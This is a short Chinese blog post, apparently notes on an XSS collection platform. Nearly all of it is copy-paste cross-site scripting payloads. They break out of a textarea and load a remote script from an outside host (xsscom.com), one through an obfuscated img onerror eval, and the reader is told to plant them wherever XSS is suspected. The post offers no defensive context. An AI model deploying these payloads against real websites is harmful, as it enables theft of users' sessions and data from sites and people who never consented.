XSSplatform
将如下代码植入怀疑出现xss的地方(注意’的转义),即可在 项目内容 观看XSS效果
</textarea>'"><script src=http://xsscom.com//a0zR72></script>
或者
</textarea>'"><img src=# id=xssyou style=display:none onerror=eval(unescape(/var%20b%3Ddocument.createElement%28%22script%22%29%3Bb.src%3D%22http%3A%2F%2Fxsscom.com%2F%2Fa0zR72%22%3B%28document.getElementsByTagName%28%22HEAD%22%29%5B0%5D%7C%7Cdocument.body%29.appendChild%28b%29%3B/.source));//>
再或者以你任何想要的方式插入
http://xsscom.com//a0zR72
再或者以你任何想要的方式插入
<script src=></script>
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Sigma!